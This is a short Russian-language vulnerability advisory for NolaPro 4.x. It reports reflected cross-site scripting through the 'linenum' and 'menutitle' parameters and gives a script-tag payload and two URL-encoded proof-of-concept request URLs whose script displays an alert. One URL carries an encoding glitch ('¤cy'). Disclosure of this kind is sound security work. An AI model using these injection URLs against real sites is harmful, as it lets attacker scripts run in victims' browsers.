Программа: NolaPro 4.x
Уязвимость позволяет удаленному пользователю выполнить XSS нападение на
целевую систему. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "linenum" сценарием nporderitemremote.php. Атакующий может
выполнить произвольный сценарий в браузере жертвы в контексте безопасности
уязвимого сайта.
Эксплоит:
<script>alert(String.fromCharCode(88,83,83,32,102,111,117,110,100,32,98,
121,32,67,111,114,101,108,97,110,32,84,101,97,109));</script>
http://nolapro_server/sidemenu.php?index=1&menutitle=
%3Cscript%3Ealert%28String.fromCharCode%2888,83,83,32,102,111,117,110,100,
32,98,121,32,67,111,114,101,108,97,110,32,84, 101,97,109%29%29;%3C/script%3E&menutitleorig=STR_ORDERS
http://nolapro_server/nporderitemremote.php?pos_mode=1¤cy=USD&curdate
=2010-04-12&linenum=%3Cscript%3Ealert%28String.fromCharCode%2888,83,83,32,102,111,117,110,100,32,
98, 121,32,67,111,114,101,108,97,110,32,84,101,97,109%29%29;%3C/script%3E&inventorylocationid=1&customerid=&shiptoid=0